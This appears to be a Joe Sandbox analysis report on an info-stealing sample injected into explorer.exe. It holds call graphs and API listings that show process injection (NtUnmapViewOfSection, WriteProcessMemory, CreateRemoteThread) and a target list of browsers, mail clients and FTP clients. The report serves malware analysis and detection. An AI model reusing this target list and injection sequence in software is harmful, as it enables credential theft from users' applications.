CryptAcquireContextA 804->882 807 300139c Sleep 887 30024d5 GetCurrentProcessId GetCurrentThreadId CreateToolhelp32Snapshot Thread32First 807->887 808 300140d 905 3002843 808->905 811 30013ae GetModuleHandleA GetProcAddress 814 30013c9 811->814 815 30013da GetModuleHandleA GetProcAddress 811->815 813 3002843 3 API calls 816 300141b RtlExitUserThread 813->816 895 3001de3 814->895 818 30013f5 815->818 819 3001406 815->819 820 3001425 816->820 821 3001de3 3 API calls 818->821 822 30024d5 10 API calls 819->822 823 300144b 820->823 824 3002608 VirtualQuery 820->824 821->819 822->808 823->724 825 300143a 824->825 825->823 910 3001493 825->910 827->767 829 3002600 828->829 830 30025cb IsWow64Process 828->830 829->779 831 30025ee 830->831 832 30025dc IsWow64Process 830->832 833 30025f9 CloseHandle 831->833 832->831 832->833 833->829 835 3002608 VirtualQuery 834->835 836 3001833 835->836 837 3001845 OpenProcess 836->837 838 3001a76 836->838 837->838 839 300185e 837->839 838->779 840 3002608 VirtualQuery 839->840 841 3001865 840->841 841->838 842 3001873 NtSetInformationProcess 841->842 843 300188f 841->843 842->843 865 3001a80 843->865 846 3001a80 2 API calls 847 30018d6 846->847 848 3001a73 CloseHandle 847->848 849 3001a80 2 API calls 847->849 848->838 850 3001900 849->850 871 3001b17 850->871 853 3001a80 2 API calls 854 3001930 RtlMoveMemory RtlMoveMemory NtUnmapViewOfSection 853->854 855 3001985 854->855 856 3001a4e CreateRemoteThread 854->856 858 300198b CreateMutexA GetLastError 855->858 861 30019bb GetModuleHandleA GetProcAddress ReadProcessMemory 855->861 857 3001a65 CloseHandle 856->857 859 3001a67 CloseHandle CloseHandle 857->859 858->855 860 30019a7 CloseHandle Sleep 858->860 859->848 860->858 862 3001a47 861->862 863 30019ec WriteProcessMemory 861->863 862->857 862->859 863->862 864 3001a16 CreateRemoteThread CloseHandle Sleep WriteProcessMemory 863->864 864->862 866 3001a94 865->866 867 30018b4 865->867 868 3001aa4 NtCreateSection 866->868 869 3001ac3 866->869 867->846 868->869 869->867 870 3001ad8 NtMapViewOfSection 869->870 870->867 872 3001b2e 871->872 878 3001b60 871->878 874 3001b30 RtlMoveMemory 872->874 873 3001bc3 875 3001910 NtUnmapViewOfSection 873->875 877 3001be1 LdrProcessRelocationBlock 873->877 874->874 874->878 875->853 876 3001b71 LoadLibraryA 876->875 876->878 877->873 877->875 878->873 878->876 879 3001ba1 GetProcAddress 878->879 879->875 879->878 880->802 881->804 883 3002664 CryptCreateHash lstrlen CryptHashData CryptGetHashParam 882->883 884 3001384 CreateMutexA GetLastError 882->884 885 30026aa wsprintfA 883->885 884->807 884->808 885->885 886 30026cc CryptDestroyHash CryptReleaseContext 885->886 886->884 888 3002515 887->888 889 3002565 CloseHandle 888->889 890 3002555 Thread32Next 888->890 891 3002521 OpenThread 888->891 889->811 890->888 892 3002544 ResumeThread 891->892 893 300253c SuspendThread 891->893 894 300254a CloseHandle 892->894 893->894 894->890 896 3001e56 895->896 897 3001ded 895->897 896->815 897->896 937 3001e93 VirtualProtect 897->937 899 3001e04 899->896 938 3002815 VirtualAlloc 899->938 901 3001e10 902 3001e1a RtlMoveMemory 901->902 903 3001e2d 901->903 902->903 939 3001e93 VirtualProtect 903->939 906 3002608 VirtualQuery 905->906 907 300284b 906->907 908 3001414 907->908 909 300284f GetProcessHeap HeapFree 907->909 908->813 909->908 911 30014c0 910->911 912 30014a1 910->912 914 3001510 911->914 915 30014c8 911->915 940 30017c7 912->940 959 30026e6 lstrlen lstrlen 914->959 917 30017c7 5 API calls 915->917 934 30014b6 915->934 919 30014e0 917->919 919->934 947 3001647 919->947 920 300155f 921 30026e6 2 API calls 920->921 924 300156c 921->924 922 3001532 961 3001752 GetModuleHandleA GetProcAddress 922->961 927 30015a0 924->927 928 3001584 924->928 924->934 930 3002404 5 API calls 927->930 927->934 964 3002404 lstrlen 928->964 933 30015ac 930->933 931 3001647 11 API calls 931->934 933->934 935 3001647 11 API calls 933->935 934->823 936 30014fb 935->936 936->934 970 30015e0 936->970 937->899 938->901 939->896 941 3001812 940->941 942 30017d1 940->942 941->934 942->941 943 30026e6 2 API calls 942->943 944 30017f1 943->944 944->941 975 3002861 GetProcessHeap RtlAllocateHeap 944->975 946 3001804 RtlMoveMemory 946->941 948 3001660 947->948 958 3001745 947->958 949 3001671 lstrlen 948->949 948->958 950 3001683 lstrlen 949->950 949->958 951 3001690 getpeername 950->951 950->958 952 30016ae inet_ntoa htons 951->952 951->958 953 30016cc 952->953 952->958 953->958 976 3002861 GetProcessHeap RtlAllocateHeap 953->976 955 3001717 wsprintfA 956 300173a 955->956 957 3002843 3 API calls 956->957 956->958 957->958 958->936 960 300151d 959->960 960->920 960->922 962 3001539 961->962 963 3001776 RtlZeroMemory RtlZeroMemory RtlZeroMemory RtlZeroMemory 961->963 962->931 962->934 963->962 965 3002456 964->965 966 300241c CryptStringToBinaryA 964->966 965->934 966->965 967 3002438 966->967 977 3002861 GetProcessHeap RtlAllocateHeap 967->977 969 3002444 CryptStringToBinaryA 969->965 971 3002843 3 API calls 970->971 972 30015f5 971->972 973 3002843 3 API calls 972->973 974 30015fc 973->974 974->934 975->946 976->955 977->969 987 3001425 988 3001432 987->988 989 300144b 987->989 990 3002608 VirtualQuery 988->990 991 300143a 990->991 991->989 992 3001493 23 API calls 991->992 992->989 993 3002806 VirtualFree 994 3001eb6 995 3001ed9 994->995 996 3001ecc lstrlen 994->996 1005 3002861 GetProcessHeap RtlAllocateHeap 995->1005 996->995 998 3001ee1 lstrcat 999 3001f16 lstrcat 998->999 1000 3001f1d 998->1000 999->1000 1006 3001f4a 1000->1006 1003 3002843 3 API calls 1004 3001f40 1003->1004 1005->998 1040 30022b8 1006->1040 1010 3001f77 1045 30027e2 lstrlen MultiByteToWideChar 1010->1045 1012 3001f86 1046 3002374 RtlZeroMemory 1012->1046 1015 300229a 1017 3002843 3 API calls 1015->1017 1016 3001fd8 RtlZeroMemory 1018 300200d 1016->1018 1019 3001f2d 1017->1019 1018->1015 1023 300203b 1018->1023 1048 30022e5 1018->1048 1019->1003 1021 3002280 1021->1015 1022 3002843 3 API calls 1021->1022 1022->1015 1023->1021 1057 3002861 GetProcessHeap RtlAllocateHeap 1023->1057 1025 300210b wsprintfW 1026 3002131 1025->1026 1030 300219e 1026->1030 1058 3002861 GetProcessHeap RtlAllocateHeap 1026->1058 1028 300216b wsprintfW 1028->1030 1029 300225d 1031 3002843 3 API calls 1029->1031 1030->1029 1059 3002861 GetProcessHeap RtlAllocateHeap 1030->1059 1032 3002271 1031->1032 1032->1021 1034 3002843 3 API calls 1032->1034 1034->1021 1035 3002256 1038 3002843 3 API calls 1035->1038 1036 30021e9 1036->1035 1060 3002815 VirtualAlloc 1036->1060 1038->1029 1039 3002243 RtlMoveMemory 1039->1035 1041 3001f69 1040->1041 1042 30022c2 1040->1042 1044 3002861 GetProcessHeap RtlAllocateHeap 1041->1044 1043 30026e6 2 API calls 1042->1043 1043->1041 1044->1010 1045->1012 1047 3001f96 1046->1047 1047->1015 1047->1016 1049 3002353 1048->1049 1051 30022f2 1048->1051 1049->1023 1050 30022f6 DnsQuery_W 1050->1051 1051->1049 1051->1050 1052 3002335 DnsFree inet_ntoa 1051->1052 1052->1051 1053 3002355 1052->1053 1061 3002861 GetProcessHeap RtlAllocateHeap 1053->1061 1055 300235f 1062 30027e2 lstrlen MultiByteToWideChar 1055->1062 1057->1025 1058->1028 1059->1036 1060->1039 1061->1055 1062->1049 978 3007728 979 3007904 978->979 980 300774b 978->980 979->979 981 300785a LoadLibraryA 980->981 985 300789f VirtualProtect VirtualProtect 980->985 982 3007871 981->982 982->980 984 3007883 GetProcAddress 982->984 984->982 986 3007899 984->986 985->979 1069 300245e lstrlen 1070 30024a5 1069->1070 1071 3002476 CryptBinaryToStringA 1069->1071 1071->1070 1072 3002489 1071->1072 1075 3002861 GetProcessHeap RtlAllocateHeap 1072->1075 1074 3002494 CryptBinaryToStringA 1074->1070 1075->1074

                                                                                                                                      Callgraph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      • Opacity -> Relevance
                                                                                                                                      • Disassembly available
                                                                                                                                      callgraph 0 Function_03001A80 1 Function_03001DC0 22 Function_03001C19 1->22 2 Function_03001D80 2->22 3 Function_03001000 18 Function_03001016 3->18 4 Function_03002841 5 Function_03002843 10 Function_03002608 5->10 6 Function_03002404 26 Function_03002861 6->26 7 Function_03002806 8 Function_03001647 8->5 8->26 36 Function_030024AE 8->36 9 Function_030017C7 9->26 32 Function_030026E6 9->32 11 Function_03001F4A 11->5 17 Function_03002815 11->17 11->26 27 Function_030027E2 11->27 31 Function_030022E5 11->31 37 Function_03002731 11->37 40 Function_03002374 11->40 42 Function_030022B8 11->42 12 Function_03002592 13 Function_03001752 14 Function_03001493 14->6 14->8 14->9 14->13 25 Function_030015E0 14->25 14->32 15 Function_03001E93 16 Function_030024D5 18->10 18->12 21 Function_03001819 18->21 18->26 29 Function_030010A4 18->29 35 Function_030025AD 18->35 18->37 38 Function_03001332 18->38 39 Function_03002573 18->39 19 Function_03001B17 20 Function_03003417 21->0 21->10 21->19 23 Function_03001E5D 23->2 24 Function_0300245E 24->26 25->5 28 Function_03001DE3 28->1 28->15 28->17 28->23 29->10 29->12 29->21 29->26 29->35 29->37 29->39 30 Function_03001425 30->10 30->14 31->26 31->27 33 Function_03007728 34 Function_03001469 34->10 34->14 38->5 38->10 38->14 38->16 38->26 38->28 43 Function_0300263E 38->43 41 Function_03001EB6 41->5 41->11 41->26 42->32

                                                                                                                                      Executed Functions

                                                                                                                                      Function 03001016 Relevance: 89.5, APIs: 30, Strings: 21, Instructions: 244stringsleepprocessCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 0 3001016-3001020 call 3002608 3 3001022-300104b call 3002861 RtlMoveMemory 0->3 4 3001097-3001098 0->4 7 3001071-3001090 GetCurrentProcessId 3->7 8 300104d-300106b call 3002861 RtlMoveMemory 3->8 12 3001092-3001093 7->12 13 300109e-30010d7 call 30010a4 call 3002861 7->13 8->7 12->4 14 3001095-3001099 call 3001332 12->14 22 30010dc-30010ea CreateToolhelp32Snapshot 13->22 14->13 23 30010f0-3001106 Process32First 22->23 24 3001322-300132d Sleep 22->24 25 300131b-300131c CloseHandle 23->25 26 300110c-300111e lstrcmpiA 23->26 24->22 25->24 27 3001280-3001289 call 30025ad 26->27 28 3001124-3001132 lstrcmpiA 26->28 34 3001305-3001313 Process32Next 27->34 35 300128b-3001294 call 3002592 27->35 28->27 29 3001138-3001146 lstrcmpiA 28->29 29->27 31 300114c-300115a lstrcmpiA 29->31 31->27 33 3001160-300116a lstrcmpiA 31->33 33->27 36 3001170-300117e lstrcmpiA 33->36 34->26 37 3001319 34->37 35->34 42 3001296-300129d call 3002573 35->42 36->27 39 3001184-3001192 lstrcmpiA 36->39 37->25 39->27 41 3001198-30011a6 lstrcmpiA 39->41 41->27 43 30011ac-30011ba lstrcmpiA 41->43 42->34 47 300129f-30012ac call 3002608 42->47 43->27 45 30011c0-30011ce lstrcmpiA 43->45 45->27 48 30011d4-30011e2 lstrcmpiA 45->48 47->34 54 30012ae-3001300 lstrcmpiA call 3002731 call 3001819 call 3002731 47->54 48->27 50 30011e8-30011f6 lstrcmpiA 48->50 50->27 52 30011fc-300120a lstrcmpiA 50->52 52->27 53 300120c-300121a lstrcmpiA 52->53 53->27 55 300121c-300122a lstrcmpiA 53->55 54->34 55->27 57 300122c-300123a lstrcmpiA 55->57 57->27 59 300123c-300124a lstrcmpiA 57->59 59->27 61 300124c-300125a lstrcmpiA 59->61 61->27 63 300125c-300126a lstrcmpiA 61->63 63->27 65 300126c-300127a lstrcmpiA 63->65 65->27 65->34
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 03002608: VirtualQuery.KERNEL32(03004434,?,0000001C), ref: 03002615
                                                                                                                                        • Part of subcall function 03002861: GetProcessHeap.KERNEL32(00000008,0000A000,030010CC), ref: 03002864
                                                                                                                                        • Part of subcall function 03002861: RtlAllocateHeap.NTDLL(00000000), ref: 0300286B
                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 03001038
                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,?,?), ref: 0300106B
                                                                                                                                      • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 03001074
                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,03001010), ref: 0300107A
                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 030010DF
                                                                                                                                      • Process32First.KERNEL32(00000000,?), ref: 030010FE
                                                                                                                                      • lstrcmpiA.KERNEL32(?,firefox.exe), ref: 0300111A
                                                                                                                                      • lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 0300112E
                                                                                                                                      • lstrcmpiA.KERNEL32(?,chrome.exe), ref: 03001142
                                                                                                                                      • lstrcmpiA.KERNEL32(?,opera.exe), ref: 03001156
                                                                                                                                      • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 03001166
                                                                                                                                      • lstrcmpiA.KERNEL32(?,outlook.exe), ref: 0300117A
                                                                                                                                      • lstrcmpiA.KERNEL32(?,thebat.exe), ref: 0300118E
                                                                                                                                      • lstrcmpiA.KERNEL32(?,thebat32.exe), ref: 030011A2
                                                                                                                                      • lstrcmpiA.KERNEL32(?,thebat64.exe), ref: 030011B6
                                                                                                                                      • lstrcmpiA.KERNEL32(?,thunderbird.exe), ref: 030011CA
                                                                                                                                      • lstrcmpiA.KERNEL32(?,filezilla.exe), ref: 030011DE
                                                                                                                                      • lstrcmpiA.KERNEL32(?,smartftp.exe), ref: 030011F2
                                                                                                                                      • lstrcmpiA.KERNEL32(?,winscp.exe), ref: 03001206
                                                                                                                                      • lstrcmpiA.KERNEL32(?,flashfxp.exe), ref: 03001216
                                                                                                                                      • lstrcmpiA.KERNEL32(?,cuteftppro.exe), ref: 03001226
                                                                                                                                      • lstrcmpiA.KERNEL32(?,mailmaster.exe), ref: 03001236
                                                                                                                                      • lstrcmpiA.KERNEL32(?,263em.exe), ref: 03001246
                                                                                                                                      • lstrcmpiA.KERNEL32(?,foxmail.exe), ref: 03001256
                                                                                                                                      • lstrcmpiA.KERNEL32(?,alimail.exe), ref: 03001266
                                                                                                                                      • lstrcmpiA.KERNEL32(?,mailchat.exe), ref: 03001276
                                                                                                                                      • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 030012B4
                                                                                                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 0300130B
                                                                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 0300131C
                                                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 03001327
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3926530110.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_3001000_explorer.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: lstrcmpi$HeapMemoryMoveProcessProcess32$AllocateCloseCreateCurrentFirstHandleNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtual
                                                                                                                                      • String ID: 0-FwP,Fw$263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
                                                                                                                                      • API String ID: 2555639992-2259378096
                                                                                                                                      • Opcode ID: c34259d2f86b7862835af5171028c3b4e836549d3fc6afbf07dd56f1630ba23a
                                                                                                                                      • Instruction ID: c2e38c66d8e85f4a3db730a8cc7acdc951b9d94ee96cc69f5db6fa9f26233d53
                                                                                                                                      • Opcode Fuzzy Hash: c34259d2f86b7862835af5171028c3b4e836549d3fc6afbf07dd56f1630ba23a
                                                                                                                                      • Instruction Fuzzy Hash: 8A71A638507305ABE749EBB1DD84E6F7BECAF45780F080969FA80C70C5DF64D5098A69
                                                                                                                                      Function 030010A4 Relevance: 80.7, APIs: 26, Strings: 20, Instructions: 203stringsleepprocessCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 03002861: GetProcessHeap.KERNEL32(00000008,0000A000,030010CC), ref: 03002864
                                                                                                                                        • Part of subcall function 03002861: RtlAllocateHeap.NTDLL(00000000), ref: 0300286B
                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 030010DF
                                                                                                                                      • Process32First.KERNEL32(00000000,?), ref: 030010FE
                                                                                                                                      • lstrcmpiA.KERNEL32(?,firefox.exe), ref: 0300111A
                                                                                                                                      • lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 0300112E
                                                                                                                                      • lstrcmpiA.KERNEL32(?,chrome.exe), ref: 03001142
                                                                                                                                      • lstrcmpiA.KERNEL32(?,opera.exe), ref: 03001156
                                                                                                                                      • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 03001166
                                                                                                                                      • lstrcmpiA.KERNEL32(?,outlook.exe), ref: 0300117A
                                                                                                                                      • lstrcmpiA.KERNEL32(?,thebat.exe), ref: 0300118E
                                                                                                                                      • lstrcmpiA.KERNEL32(?,thebat32.exe), ref: 030011A2
                                                                                                                                      • lstrcmpiA.KERNEL32(?,thebat64.exe), ref: 030011B6
                                                                                                                                      • lstrcmpiA.KERNEL32(?,thunderbird.exe), ref: 030011CA
                                                                                                                                      • lstrcmpiA.KERNEL32(?,filezilla.exe), ref: 030011DE
                                                                                                                                      • lstrcmpiA.KERNEL32(?,smartftp.exe), ref: 030011F2
                                                                                                                                      • lstrcmpiA.KERNEL32(?,winscp.exe), ref: 03001206
                                                                                                                                      • lstrcmpiA.KERNEL32(?,flashfxp.exe), ref: 03001216
                                                                                                                                      • lstrcmpiA.KERNEL32(?,cuteftppro.exe), ref: 03001226
                                                                                                                                      • lstrcmpiA.KERNEL32(?,mailmaster.exe), ref: 03001236
                                                                                                                                      • lstrcmpiA.KERNEL32(?,263em.exe), ref: 03001246
                                                                                                                                      • lstrcmpiA.KERNEL32(?,foxmail.exe), ref: 03001256
                                                                                                                                      • lstrcmpiA.KERNEL32(?,alimail.exe), ref: 03001266
                                                                                                                                      • lstrcmpiA.KERNEL32(?,mailchat.exe), ref: 03001276
                                                                                                                                      • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 030012B4
                                                                                                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 0300130B
                                                                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 0300131C
                                                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 03001327
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3926530110.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_3001000_explorer.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: lstrcmpi$HeapProcess32$AllocateCloseCreateFirstHandleNextProcessSleepSnapshotToolhelp32
                                                                                                                                      • String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
                                                                                                                                      • API String ID: 3950187957-1680033604
                                                                                                                                      • Opcode ID: ec4eac4b381b8f6afad43e11c2b4e9012596689b428583bf6b43af1fdd7ed306
                                                                                                                                      • Instruction ID: 0a8ee50e13651c217a5926ada0d52eeda5f63bf67841ae8ce13fc41dc8a70ad4
                                                                                                                                      • Opcode Fuzzy Hash: ec4eac4b381b8f6afad43e11c2b4e9012596689b428583bf6b43af1fdd7ed306
                                                                                                                                      • Instruction Fuzzy Hash: 6251A638607305AAFB45EBB18D84E6FB6EC6F45780F0C0969FA80C70C5DF64D5098A79
                                                                                                                                      Function 03007728 Relevance: 6.2, APIs: 4, Instructions: 204COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 113 3007728-3007745 114 300774b-3007758 113->114 115 300790d 113->115 116 300776a-300776f 114->116 115->115 117 3007771 116->117 118 3007760-3007765 117->118 119 3007773 117->119 120 3007766-3007768 118->120 121 3007778-300777a 119->121 120->116 120->117 122 3007783-3007787 121->122 123 300777c-3007781 121->123 122->121 124 3007789 122->124 123->122 125 3007794-3007799 124->125 126 300778b-3007792 124->126 127 30077a8-30077aa 125->127 128 300779b-30077a4 125->128 126->121 126->125 131 30077b3-30077b7 127->131 132 30077ac-30077b1 127->132 129 30077a6 128->129 130 300781a-300781d 128->130 129->127 133 3007822-3007825 130->133 134 30077c0-30077c2 131->134 135 30077b9-30077be 131->135 132->131 136 3007827-3007829 133->136 137 30077e4-30077f3 134->137 138 30077c4 134->138 135->134 136->133 141 300782b-300782e 136->141 139 3007804-3007811 137->139 140 30077f5-30077fc 137->140 142 30077c5-30077c7 138->142 139->139 144 3007813-3007815 139->144 140->140 143 30077fe 140->143 141->133 145 3007830-300784c 141->145 146 30077d0-30077d4 142->146 147 30077c9-30077ce 142->147 143->120 144->120 145->136 148 300784e 145->148 146->142 149 30077d6 146->149 147->146 150 3007854-3007858 148->150 151 30077e1 149->151 152 30077d8-30077df 149->152 153 300785a-3007870 LoadLibraryA 150->153 154 300789f-30078a2 150->154 151->137 152->142 152->151 156 3007871-3007876 153->156 155 30078a5-30078ac 154->155 157 30078d0-3007900 VirtualProtect * 2 155->157 158 30078ae-30078b0 155->158 156->150 159 3007878-300787a 156->159 164 3007904-3007908 157->164 162 30078b2-30078c1 158->162 163 30078c3-30078ce 158->163 160 3007883-3007890 GetProcAddress 159->160 161 300787c-3007882 159->161 165 3007892-3007897 160->165 166 3007899-300789c 160->166 161->160 162->155 163->162 164->164 167 300790a 164->167 165->156 167->115
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3926530110.0000000003006000.00000040.80000000.00040000.00000000.sdmp, Offset: 03006000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_3006000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: f48b649156c5649bb4704ab3df593b5abe5b098dea6efab04fa834a199e68a6d
                                                                                                                                      • Instruction ID: 43c3ee96cb96c4817a811294e984c2ff627643a06f4b850a94a9ffa860cf70bc
                                                                                                                                      • Opcode Fuzzy Hash: f48b649156c5649bb4704ab3df593b5abe5b098dea6efab04fa834a199e68a6d
                                                                                                                                      • Instruction Fuzzy Hash: 2D51F97194A3914FE722CA78CCC06657BE4DB42660F1D06B9C5E5C72C6E69C7806C7A1
                                                                                                                                      Function 03002861 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 168 3002861-3002871 GetProcessHeap RtlAllocateHeap
                                                                                                                                      APIs
                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,0000A000,030010CC), ref: 03002864
                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 0300286B
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3926530110.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_3001000_explorer.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Heap$AllocateProcess
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1357844191-0
                                                                                                                                      • Opcode ID: c0d942bfe9c97b4abe56fdcd52574d1cf8c32b3a787c8ecf169564366cec3ff1
                                                                                                                                      • Instruction ID: 2cdc7ee21af0e5ec465d3354239ff032833af8a47eda9b6cf99aabd19c1f046c
                                                                                                                                      • Opcode Fuzzy Hash: c0d942bfe9c97b4abe56fdcd52574d1cf8c32b3a787c8ecf169564366cec3ff1
                                                                                                                                      • Instruction Fuzzy Hash: F1A012744032007FDD4237A0AA1DF053A1CA740305F0080807189C40448A68004C8722

                                                                                                                                      Non-executed Functions

                                                                                                                                      Function 03001819 Relevance: 49.2, APIs: 23, Strings: 5, Instructions: 208injectionnativesleepCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 03002608: VirtualQuery.KERNEL32(03004434,?,0000001C), ref: 03002615
                                                                                                                                      • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,7556E800,microsoftedgecp.exe,?), ref: 0300184E
                                                                                                                                      • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 03001889
                                                                                                                                      • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 03001919
                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,03003428,00000016), ref: 03001940
                                                                                                                                      • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 03001968
                                                                                                                                      • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 03001978
                                                                                                                                      • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 03001992
                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 0300199A
                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 030019A8
                                                                                                                                      • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 030019AF
                                                                                                                                      • GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 030019C5
                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 030019CC
                                                                                                                                      • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 030019E2
                                                                                                                                      • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 03001A0C
                                                                                                                                      • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 03001A1F
                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 03001A26
                                                                                                                                      • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 03001A2D
                                                                                                                                      • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 03001A41
                                                                                                                                      • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 03001A58
                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 03001A65
                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 03001A6B
                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 03001A71
                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000), ref: 03001A74
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000B.00000002.3926530110.0000000003001000.00000040.80000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_11_2_3001000_explorer.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                                                                                                                                      • String ID: 0-FwP,Fw$atan$microsoftedgecp.exe$ntdll$opera_shared_counter
                                                                                                                                      • API String ID: 1066286714-483016567
                                                                                                                                      • Opcode ID: 97fa8b9768162d68e705b6cac01f69bc2c801310289019c75af80d2a7f575960
                                                                                                                                      • Instruction ID: aa772040770cccb778fcb1ca6806cfbfa74854c37db3951f3a2abe4ed6fdc443
                                                                                                                                      • Opcode Fuzzy Hash: 97fa8b9768162d68e705b6cac01f69bc2c801310289019c75af80d2a7f575960
                                                                                                                                      • Instruction Fuzzy Hash: 0461F339106304AFE315DF25DD84E6BBBECEF89754F040659F589E3281DB74D9048BA2
                                                                                                                                      Function 0300263E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 68encryptionstringCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 0300265A
                                                                                                                                      • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 03002672
